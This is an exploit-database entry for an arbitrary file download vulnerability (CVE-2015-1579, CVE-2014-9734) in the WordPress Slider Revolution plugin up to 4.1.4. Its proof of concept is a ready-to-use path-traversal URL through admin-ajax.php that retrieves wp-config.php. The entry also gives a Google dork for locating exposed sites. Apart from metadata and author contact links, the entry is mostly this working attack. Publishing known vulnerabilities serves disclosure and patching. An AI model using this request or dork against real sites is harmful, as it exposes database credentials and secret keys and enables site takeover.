WordPress Plugin Slider REvolution 4.1.4 - Arbitrary File Download

Author: Claudio Viviani
type: webapps
platform: php
port: 
date_added: 2015-03-30  
date_updated: 2015-03-30  
verified: 0  
codes: CVE-2015-1579;OSVDB-109645;CVE-2014-9734  
tags: WordPress Plugin  
aliases:   
screenshot_url:   
application_url:   

raw file: 36554.txt  

# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380

# Software Link : Premium plugin

# Dork Google: revslider.php "index of"


# Date : 2014-07-24

# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox


######################

# Description

Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability


######################

# PoC

http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


#####################

Discovered By : Claudio Viviani

        http://www.homelab.it
        info@homelab.it
        homelabit@protonmail.ch

        https://www.facebook.com/homelabit
        https://twitter.com/homelabit
        https://plus.google.com/+HomelabIt1/
        https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################